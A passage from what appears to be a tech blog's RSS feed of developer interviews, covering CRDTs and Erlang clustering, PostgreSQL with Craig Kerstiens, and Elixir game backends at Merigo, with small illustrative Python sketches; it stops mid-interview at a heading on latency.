&lt;p&gt;CRDTs say, rather than have opaque registers, why not store actual data types in the database, and then have a conflict resolution policy that is compatible with the semantics of the data type. One example of a trivial CRDT is the grow-only set: if you can never remove elements from the set, it’s always safe to merge copies of a set, that is independently modified, using the set union operation. Similar designs exist for sets where you can add and remove elements arbitrarily, graphs, dictionaries, counters, and booleans.&lt;&#x2F;p&gt;
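&lt;p&gt;The grow-only set is small enough to sketch in full (a toy Python illustration of the idea, not any particular CRDT library):&lt;&#x2F;p&gt;

```python
# Grow-only set: the only mutation is add, so merging any two replica
# states with set union is safe and deterministic.
class GSet:
    def __init__(self, items=()):
        self.items = set(items)

    def add(self, x):
        self.items.add(x)

    def merge(self, other):
        # union is commutative, associative and idempotent,
        # so replicas converge regardless of how states are exchanged
        return GSet(self.items | other.items)
```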
&lt;p&gt;&lt;strong&gt;What other alternatives exist apart from CRDTs to solve the same type of issue?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Operational transformation is an alternative approach, which predates CRDTs, and was used to build both Google Docs and Apache Wave. Operational transformation relies on “transforming” edit operations based on concurrent operations so they achieve the desired effect once the document has been modified. There exist a significant number of different algorithms, each of which makes a different set of tradeoffs, and no algorithm is better than the others in the general case. These algorithms are extremely difficult to implement correctly and to verify, given the number of possible operations, operation interleavings and transformations that must be considered.&lt;&#x2F;p&gt;
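&lt;p&gt;To give a flavor of the idea (a toy Python sketch; real OT algorithms cover many more operation types and interleavings, which is exactly where the difficulty lies): two concurrent inserts into the same string converge if each replica transforms the remote operation against the one it already applied, breaking position ties with a site id:&lt;&#x2F;p&gt;

```python
# An operation is (position, text, site_id); site_id breaks ties so both
# replicas order equal-position inserts the same way.
from operator import lt

def apply_insert(doc, op):
    pos, text, _site = op
    return doc[:pos] + text + doc[pos:]

def transform(op, against):
    # shift op right if a concurrent insert landed at or before its position
    pos, text, site = op
    apos, atext, asite = against
    if lt(apos, pos) or (apos == pos and lt(asite, site)):
        return (pos + len(atext), text, site)
    return op
```

&lt;p&gt;Applying the local operation and then the transformed remote one yields the same document on both replicas.&lt;&#x2F;p&gt;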
&lt;p&gt;&lt;strong&gt;Are there any downsides of using CRDTs?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;CRDTs can be very expensive in terms of implementation and state synchronization. Lots of effort has gone into reducing the overhead in state transmission through both operations-based CRDTs (a variant that sends just operations instead of state, with the tradeoff that it requires a stronger property for message delivery from the network) and delta-CRDTs (a variant that minimizes the required state that needs to be transferred by minimizing the change representation.)&lt;&#x2F;p&gt;
&lt;p&gt;One open challenge for both CRDTs, and any system that has to manage a large number of replicas of objects that will be concurrently operated on, is actor management. Typically, these systems and data structures must carry metadata whose size is O(n) in the number of actors that ever modified an object in the system: in a system with a large number of mobile devices and high churn, this can be prohibitive in terms of space. Recent approaches to address this problem rely on either imposing a structure on the way nodes share information with one another, to allow some nodes to subsume the changes of other nodes, or allowing transient nodes to temporarily “borrow” identities from a smaller number of permanent nodes, so the identifiers of temporary nodes aren’t carried around in the object’s metadata indefinitely.&lt;&#x2F;p&gt;
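&lt;p&gt;The metadata cost is easy to see in a grow-only counter (again a toy Python sketch, not a production CRDT implementation): every actor that ever increments the counter leaves an entry behind, and merge must keep them all:&lt;&#x2F;p&gt;

```python
# Grow-only counter: one entry per actor that ever incremented it.
# The per-actor map is exactly the O(n) metadata growth described above.
class GCounter:
    def __init__(self, entries=None):
        self.entries = dict(entries or {})

    def increment(self, actor, n=1):
        self.entries[actor] = self.entries.get(actor, 0) + n

    def value(self):
        return sum(self.entries.values())

    def merge(self, other):
        # pointwise max keeps every actor's highest known contribution
        actors = set(self.entries) | set(other.entries)
        merged = {a: max(self.entries.get(a, 0), other.entries.get(a, 0))
                  for a in actors}
        return GCounter(merged)
```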
&lt;p&gt;&lt;strong&gt;What is &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lasp-lang.readme.io&#x2F;docs&#x2F;what-is-lasp-pg&quot;&gt;&lt;strong&gt;Lasp process registry&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? Why create a new process registry if we already have global, pg2, gproc or syn in Erlang?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;About three or so years ago I created Riak PG, a process registry that used the same distribution strategy as Riak (with a corresponding paper presented at the Erlang Workshop that year). I created this process registry because I had done an extensive study and writeup about why pg2, gproc, and global are not designed properly for distributed scenarios where partitions can occur and availability is paramount.&lt;&#x2F;p&gt;
&lt;p&gt;Lasp PG is a natural extension of this, where it uses full replication over an unstructured overlay with CRDTs, instead of partial replication across a structured overlay network.&lt;&#x2F;p&gt;
&lt;p&gt;While Ericsson is working on scaling the global facility and growing distributed Erlang to support a larger number of nodes, they are focusing on:&lt;&#x2F;p&gt;
&lt;p&gt;a) supporting existing applications developed at Ericsson with distributed Erlang&lt;&#x2F;p&gt;
&lt;p&gt;b) smaller scale of nodes, operating in a LAN configuration (think ~200–500)&lt;&#x2F;p&gt;
&lt;p&gt;Their solution for scaling global shards the information across nodes, and requires availability of the DHT (they are using Kademlia, a structured overlay network) for requests to be serviced.&lt;&#x2F;p&gt;
&lt;p&gt;Lasp (and, therefore, Lasp PG) is focusing on large-scale, wide-area programming: think ~10–100k nodes operating at geo-scale. In this scenario, partitions are common — in fact, mobile clients or IoT devices might disable their antennas to preserve battery. In this scenario, we have to assume that nodes are not aware of every other node in the network, have to route messages through other nodes, and have to be resilient to partitions and have the ability to keep operating. Lasp PG is the first step towards this, and our work that was presented at Erlang Factory, Loquat, is the second step towards this goal.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you think that parts of what you created and found while developing Lasp will be ported to more traditional programming languages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Hopefully, but it’s unclear what components will end up being useful or not. We are mainly focused on quickly prototyping things and performing evaluations, all in Erlang and Elixir, to determine which approaches scale, are easy to program with, etc.&lt;&#x2F;p&gt;
&lt;p&gt;I think that once we get a bit further along in the research, maybe 4 to 5 years, that some of the ideas we’re just coming up with now might be useful and developed enough to make it into the mainstream.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lasp-lang.readme.io&#x2F;docs&#x2F;overview&quot;&gt;&lt;strong&gt;Partisan&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? Why did you not use the default distributed Erlang?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Partisan is a membership layer for clustering groups of Erlang nodes. It bypasses distributed Erlang completely, can run in a variety of topologies, will soon support connection multiplexing, and has full support for TLS&#x2F;SSL. Partisan can support clusters of nodes running in star-topologies, random unstructured overlays, and clusters that are fully connected.&lt;&#x2F;p&gt;
&lt;p&gt;Distributed Erlang is a bit too rigid for us: it assumes a fully connected network, which is extremely difficult to scale to large clusters of nodes, and uses a single TCP connection between all processes communicating from one node to another. In order to build a more reliable system that would scale to large clusters of nodes securely, we needed our own membership layer for state dissemination. Right now, Partisan doesn’t support all of the semantics that Erlang provides, but we’re actively working with some developers in the open source community to extend Partisan to support normal Erlang message passing across our highly-available framework.&lt;&#x2F;p&gt;
&lt;p&gt;We’ve also started to see some companies using Erlang and Elixir pick up Partisan as a tool for helping them build reliable, large-scale applications that need to do efficient state dissemination, which is very nice for an implementation that came out of a research group.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What other programming languages or pieces of software do you keep an eye on?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Right now, what I’m most excited about is Space-Time Insight’s implementation of Microsoft Orleans in Erlang, called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;SpaceTime-IoT&#x2F;erleans&quot;&gt;Erleans&lt;&#x2F;a&gt;. I think that Orleans takes a lot of the complexity out of actor management in Erlang and Elixir and helps developers get straight to building distributed applications without having to focus on the low level details around message routing, actor placement, and actor creation and termination.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you recommend reading or doing for those of us that we are trying to learn more about distributed systems?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think that everyone is building distributed applications nowadays — from your web developer building a rich-web client in JavaScript to mobile developers building the next hit application — we all have to deal with the problems of state, synchronization, offline operation, and maintaining consistency.&lt;&#x2F;p&gt;
&lt;p&gt;That said, from the academic side, I’ll recommend &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.springer.com&#x2F;gp&#x2F;book&#x2F;9783642152597&quot;&gt;“Introduction to Reliable and Secure Distributed Programming”&lt;&#x2F;a&gt; from Cachin, Guerraoui, and Rodrigues. It’s the book that my university teaches with, and the course that I’ve TA’d and contributed content to.&lt;&#x2F;p&gt;
&lt;p&gt;The course is also taught as a MOOC on edX, and I’ll be doing a guest lecture this semester in Part 2 on Lasp and CRDTs.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.edx.org&#x2F;course&#x2F;reliable-distributed-algorithms-part-1-kthx-id2203-1x&quot;&gt;Reliable Distributed Algorithms, Part 1&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.edx.org&#x2F;course&#x2F;reliable-distributed-algorithms-part-2-kthx-id2203-2x&quot;&gt;Reliable Distributed Algorithms, Part 2&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>The big old reliable elephant: talking about Postgres with Craig Kerstiens</title>
          <pubDate>Wed, 26 Apr 2017 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-big-old-reliable-elephant-talking-about-postgres-with-craig-kerstiens/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-big-old-reliable-elephant-talking-about-postgres-with-craig-kerstiens/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-big-old-reliable-elephant-talking-about-postgres-with-craig-kerstiens/">&lt;p&gt;In this opportunity I interviewed Craig Kerstiens. Craig works for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.citusdata.com&#x2F;&quot;&gt;citusdata&lt;&#x2F;a&gt;, a company that helps customers scale databases beyond a single node. Over the last few years, after building systems that used Redis, Cassandra, Riak, Elasticsearch and even Mongo, I rediscovered my love for PostgreSQL. The documentation is excellent, its development pace is astonishing and it is a good old reliable beast. However its feature set can be quite overwhelming. To mention just a few of its special features: it offers a wide selection of index types (B-tree, Hash, GiST, SP-GiST, GIN and BRIN), many &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.craigkerstiens.com&#x2F;2014&#x2F;05&#x2F;07&#x2F;Postgres-datatypes-the-ones-youre-not-using&#x2F;&quot;&gt;data types&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;railsware.com&#x2F;blog&#x2F;&#x2F;2012&#x2F;04&#x2F;23&#x2F;postgresql-most-useful-extensions&#x2F;&quot;&gt;extensions&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;postgresguide.com&#x2F;sql&#x2F;window.html&quot;&gt;window functions&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;postgresguide.com&#x2F;cool&#x2F;ctes.html&quot;&gt;common table expressions&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.craigkerstiens.com&#x2F;2013&#x2F;08&#x2F;05&#x2F;a-look-at-FDWs&#x2F;&quot;&gt;foreign data wrappers&lt;&#x2F;a&gt;. 
As Craig said in one of his talks, “Postgres is the Emacs of databases”. If you have ever used Emacs you know that learning it can take some time due to the number of choices available.&lt;&#x2F;p&gt;
&lt;p&gt;Craig helped me decide what postgres features to use and how, thanks to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.craigkerstiens.com&#x2F;content&#x2F;&quot;&gt;his blog&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.postgresguide.com&#x2F;&quot;&gt;postgresguide.com&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;postgresweekly.com&#x2F;&quot;&gt;postgresweekly.com&lt;&#x2F;a&gt;. He has been really helpful in sharpening my postgres knife.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Discuss and vote at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;y0k2h5&#x2F;big_old_reliable_elephant_talking_about&quot;&gt;lobsters&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;67owq6&#x2F;the_big_old_reliable_elephant_talking_about&#x2F;&quot;&gt;reddit&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=14203940&quot;&gt;hn&lt;&#x2F;a&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-xBJtkf59c2V5ncf-Q-1_Eg.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why do you prefer PostgreSQL over other SQL databases?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It was actually a little ways into my career before I came around to Postgres. I started on Oracle in college. When I found Postgres it was a bit stodgy and just correct. There was nothing wrong with it, but it wasn’t anything to write home about. What was interesting about it was the license, which made it very favorable to fork, extend and add more value. Since that time though it’s really come a long way from a user experience perspective, and really expanded beyond the “SQL” world.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why do you think a lot of developers moved away from SQL databases a few years ago?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;To be right to the point… user experience. SQL is a great language for querying lots of data. The idea that you have to set up your schema ahead of time and define your data model is painful though. Over the long term it pays off, but there is nothing inherent in SQL that says you can’t model things in documents and have that transformed to relational. The ease and promise of document databases is huge for getting started, but it’s not a perfect long term solution…&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did many of them return to use SQL databases?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The ability to get up and running quickly is always at odds with long term maintainability. That’s not to say that you should prematurely optimize, but SQL has stood the test of time for querying and accessing data, and we’re seeing that in a return to systems that re-implement SQL on top of other datastores.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In which cases wouldn’t you use PostgreSQL?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The only one that really comes to mind is graph databases. Over time PostgreSQL has gained support for XML, key value, full text search and document storage; the only thing it hasn’t really covered yet is the graph arena.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is the most misused feature of PostgreSQL or SQL?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Wow, that’s a tough one. I’m going to completely sidestep the question and say that it’s not leveraging Postgres specific features. I see a lot of developers say “I want to be able to migrate away, so I’m going to do the most generic bare bones thing possible”. Whether that’s not using the array datatype, JSONB, or GIN and GiST indexes, at that point why even pick Postgres? The biggest mistake I see is not misusing a feature; it’s not using features at all because of the idea that you might one day migrate.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are your favorite PostgreSQL extensions?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Obviously I’m biased towards &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;citusdata&#x2F;citus&quot;&gt;Citus&lt;&#x2F;a&gt;. I’ve actually known the Citus team for over 4 years now, before they were an extension to Postgres. At Heroku, what I would hear and see over and over is people running into this ceiling with Postgres. SQL databases typically work really well on a single node, and there’s this notion that SQL can’t be distributed. Citus actually solves a problem I saw hundreds of customers hit as they outgrew single node Postgres, whether at 100 GB or 1 TB: it makes it trivial to shard out while still maintaining transactional semantics.&lt;&#x2F;p&gt;
&lt;p&gt;Though I have to mention my second favorite: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.citusdata.com&#x2F;blog&#x2F;2017&#x2F;04&#x2F;04&#x2F;distributed_count_distinct_with_postgresql&#x2F;&quot;&gt;HyperLogLog&lt;&#x2F;a&gt;. This is one I personally have not got to put into production, but is super awesome. It’s essentially a sketch algorithm for probabilistic distincts across really large datasets.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there any feature that another database has that you would like PostgreSQL to have?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think the biggest would be easier onboarding or not having to define your schema ahead of time. ToroDB aims to do some of this for Postgres when coming from Mongo, but a native Postgres experience would be huge here.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you recommend reading to understand the implementation of PostgreSQL?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Subscribe to the hackers mailing list.&lt;br &#x2F;&gt;
&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.postgresql.org&#x2F;list&#x2F;pgsql-hackers&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.postgresql.org&#x2F;list&#x2F;pgsql-hackers&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The best engineers (even ones that don’t actively develop for Postgres) subscribe here, as it’s just great discussion and development.&lt;&#x2F;p&gt;
&lt;p&gt;And for a lighter read, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;postgresweekly.com&quot;&gt;postgresweekly.com&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you recommend reading to get better at SQL and PostgreSQL?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I actually got my foundation in relational algebra. At the time it seemed overly academic, like a lot of other CS, but when it comes to databases, and SQL in particular, it gives you a huge leg up. I’d very much encourage people to spend some time on the academic side of relational algebra and then move to SQL syntax; over the long term it’ll really pay off.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Gaming with Elixir: discovering new lands in the BEAM realm</title>
          <pubDate>Thu, 20 Apr 2017 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/gaming-with-elixir-discovering-new-lands-in-the-beam-realm/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/gaming-with-elixir-discovering-new-lands-in-the-beam-realm/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/gaming-with-elixir-discovering-new-lands-in-the-beam-realm/">&lt;p&gt;In this opportunity I interviewed somebody I don’t normally interview: a client, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.linkedin.com&#x2F;in&#x2F;chrisjimison&#x2F;&quot;&gt;Chris Jimison&lt;&#x2F;a&gt;, CTO of Merigo. After working for almost a year with Merigo, I appreciate and understand the differences between using a BEAM language to develop a typical REST JSON system and using it to develop a videogame backend. I am not aware of many companies using Elixir to develop game backends. I have only watched a talk by Jamie Winsor called “&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;youtu.be&#x2F;_i6n-eWiVn4&quot;&gt;Building And Releasing A Massively Multiplayer Online Game”&lt;&#x2F;a&gt;. I hope to be able to interview Jamie in the following weeks.&lt;&#x2F;p&gt;
&lt;p&gt;To sum up, I did this interview because I wanted to share my experience of using Elixir for developing a different kind of beast. I am also writing a post about what I like and dislike about Elixir after developing in Erlang for quite a few years.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Discuss and vote at&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;f1wxuc&#x2F;gaming_with_elixir_discovering_new_lands&quot;&gt; &lt;em&gt;lobsters&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;,&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;66hnpk&#x2F;gaming_with_elixir_discovering_new_lands_in_the&#x2F;&quot;&gt;&lt;em&gt;reddit&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;and&lt;&#x2F;em&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=14156379&quot;&gt; &lt;em&gt;hn&lt;&#x2F;em&gt;&lt;&#x2F;a&gt; &lt;em&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-3HjK0CX5813XXtDwfKIhWw.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Could you describe your experience in the software industry?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I started in the software industry about 15 years ago. My career has been focused on the game development industry, specializing in networking problems. This includes games that have a peer-to-peer deterministic gameplay model, all the way to big MMORPG titles. In the last 7 years I have been working on mobile titles where the game networking requirements are more of a hybrid of REST and MMORPG-style technologies. Some companies I have worked for in the past include EA, Sony R&amp;amp;D, NGMOCO and DeNA.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;merigo.co&#x2F;&quot;&gt;&lt;strong&gt;Merigo&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;About 3 and a half years ago my cofounders and I decided we wanted to start our own company to help game developers be more successful in the market. One of the big issues that has come around in the last 4–5 years is that single player games just don’t make that much money in the marketplace (outside of the occasional indie hit). As mobile game developers move into the “Online Gaming” space, the costs of creating these applications are increasing exponentially. When the iPhone 3G first launched (this was the first model that had the App Store) many game teams consisted of one or two engineers — a “large” game having 3–5 engineers. We are now seeing team sizes of anywhere between 10–20 and have even heard of some titles consisting of over 30 engineers. This means costs of titles are skyrocketing and the need to “fail fast” is more critical. “Fail fast” gets to the heart of game development. A game designer comes up with an idea they “think” will be fun. However, you don’t truly know until you have it in your hands to play. Some ideas work, some don’t. With such a high development cost, many game teams must choose to implement a feature and hope that it works because they don’t have the budget to try a second or third time. Merigo wants teams spending more time “focusing on the fun” and less time worrying about how to make it all work.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is SDE?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The Merigo SDE (Server Development Environment) is a system that allows developers to build out their server logic quickly without having to worry about all the pain of how to scale out and manage their stack. We provide many common game services such as authentication, purchase verification, leaderboards, player persistence, etc. However, the SDE is not a bunch of black box REST APIs. The SDE enables developers to write custom “scripts” in Elixir that can be loaded&#x2F;updated at runtime, allowing them to create custom APIs and behaviors needed for their application. Since we have provided the basic framework of how the scripts are managed and when they are called, we can now “scale” this logic out across a distributed server cluster. Our main philosophy with the SDE is “servers are cheap, people are expensive”. With the SDE we wanted to provide a system that allows for fast development and rapid iteration with the knowledge that you can always spin up new servers to balance the load, even if your business logic is not optimized for high performance. Each team can then decide where to best invest their time once the game goes “live”: building new features or optimizing their code to reduce their server costs. Basically it turns development into a simple Return on Investment (ROI) equation.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What languages&#x2F;platforms did you consider or try before settling on BEAM&#x2F;Elixir?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Java, Scala, Go and for one crazy day I even debated just writing the whole stack in C++.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What made you choose the Erlang VM (BEAM) instead of the JVM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I hate writing Java… The real reason we didn’t go with a JVM environment is tuning it is kind of a black art and something I have not done in years (since Java 1.4).&lt;&#x2F;p&gt;
&lt;p&gt;Also, we had the following goals:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;High level of fault tolerance&lt;br &#x2F;&gt;
a. Because game teams write “scripts”, we did not want them to be able to bring the node down because they wrote bad code&lt;br &#x2F;&gt;
b. If the game server goes down, this is VERY bad for game developers. Users will get mad quickly and just download a different game, with a very slim chance they may come back&lt;br &#x2F;&gt;
c. User Acquisition (UA) is expensive. To “buy” a user (this is done via Ads or Promotions, etc.) you can spend up to $30 per person, and if your game server has crashed, that money is gone.&lt;&#x2F;li&gt;
&lt;li&gt;Easy to scale horizontally&lt;&#x2F;li&gt;
&lt;li&gt;Easy to upgrade servers with hot patches without taking the system down&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;With those three goals BEAM is one of the best tools for the job.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Lua is a language that is pretty common in the game development community. The Erlang VM has a Lua based language called Luerl. Why did you choose to implement Playground in Elixir instead of Luerl?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We actually started with Luerl in early 2014 as our scripting language. The problem with Luerl at the time (I have not reviewed it in some years) was that its basic architecture didn’t fit our needs. Luerl is designed for you to pass it a bunch of data, process that data in Lua, then get the results back. However, if you don’t know what the Lua code will be doing, you need to pass in ALL possible data in one big map (and this was pre-Erlang maps so it was a custom struct the Luerl lib created). This meant we had to spend a lot of time modifying the actual Luerl package to extend its basic APIs so the game logic could “ask” our Erlang code for needed data, etc. Around mid&#x2F;late 2014 Elixir had matured and we felt that the language was easy enough that most folks could pick up the basic syntax without a lot of work. In the end we are really happy that we moved off Luerl. Now our System &amp;lt;-&amp;gt; scripting environment has near-zero overhead (we don’t have to serialize&#x2F;deserialize structs, etc). In fact we liked Elixir so much we ended up porting all of our Erlang system to it and now we are pretty much an Elixir shop.&lt;&#x2F;p&gt;
&lt;p&gt;Also, Elixir made it easy to “walk” the code AST so we can check it for operations we don’t allow. For example, when a team writes Elixir business logic we don’t allow them to use OTP, or even spawn processes, etc.&lt;&#x2F;p&gt;
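&lt;p&gt;The same trick is easy to demo with Python’s &lt;code&gt;ast&lt;&#x2F;code&gt; module; this is purely an illustration of the idea, not Merigo’s Elixir code, and the blocklist below is a made-up stand-in for their OTP&#x2F;spawn bans: parse the script, walk every node, and reject the operations you don’t allow.&lt;&#x2F;p&gt;

```python
import ast

# Hypothetical blocklist, standing in for the OTP/spawn bans the
# interview describes for Elixir scripts.
BANNED_CALLS = {"eval", "exec", "open", "__import__"}

def check_script(source):
    """Parse a user script and return (line, offense) for banned operations."""
    violations = []
    for node in ast.walk(ast.parse(source)):
        # direct calls to banned builtins, e.g. eval("...")
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BANNED_CALLS:
                violations.append((node.lineno, node.func.id))
        # this sketch also refuses any import
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            violations.append((node.lineno, "import"))
    return violations
```

Because the check runs on the syntax tree before anything executes, a bad script can be rejected at upload time instead of taking a node down at runtime, which is exactly the property the interview is after.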
&lt;p&gt;&lt;strong&gt;What is the biggest difference between implementing a backend for a video game and a HTTP REST JSON api?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It all boils down to two things: latency and state.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;State&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Games are very stateful, and if you had to send all the data needed to finish a REST-based transaction your JSON would be HUGE both upstream and downstream. Games also tend to react to events that the user did not generate, so bi-directional communication is a very strong requirement. For example: If player 1 attacks player 2, player 2 will need to be notified of this event and different actions may be triggered if player 2 is online or not. Also, this state may need to be presented to other players, so in the last example player 3 may see that players 1 and 2 are in combat so he&#x2F;she may jump in and help player 2.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Latency&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
